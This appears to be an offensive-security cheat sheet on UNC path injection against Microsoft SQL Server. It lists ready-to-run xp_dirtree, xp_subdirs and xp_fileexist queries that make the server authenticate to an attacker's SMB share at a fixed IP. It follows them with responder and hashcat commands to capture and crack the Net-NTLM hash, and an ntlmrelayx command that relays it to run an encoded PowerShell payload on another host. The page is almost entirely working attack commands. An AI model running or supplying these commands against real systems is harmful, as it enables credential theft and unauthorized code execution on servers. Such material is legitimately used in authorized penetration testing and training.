# UNC Path Injection

## Overview

This attack takes advantage of the xp\_dirtree procefure to force an SQL server to connect to a SMB share that the attacker controls, allow the attacker to capture the Net-NTLM hash of the SQL account to be cracked offline or relayed. 

## Examples

### xp\_dirtree

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_dirtree \"\\\\192.168.119.120\\\\test\";
```

{% endcode %}

### xp\_subdirs

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_subdirs\"\\\\192.168.119.120\\\\test\";
```

{% endcode %}

### xp\_fileexist

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_fileexist\"\\\\192.168.119.120\\\\test\";
```

{% endcode %}

## Capturing\Relaying the Net-NTLM

### Using responder to capture the Net-NTLM hash

{% code overflow="wrap" %}

```bash
sudo responder -I tap0

# hashcat command to crack the hash
hashcat -m 5600 hash.txt dict.txt --force
```

{% endcode %}

### Relaying the Net-NTLM hash

{% hint style="info" %}
SMB signing needs to be disabled to perform this attack.
{% endhint %}

{% code overflow="wrap" %}

```bash
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc <base64 encoded payload>'
```

{% endcode %}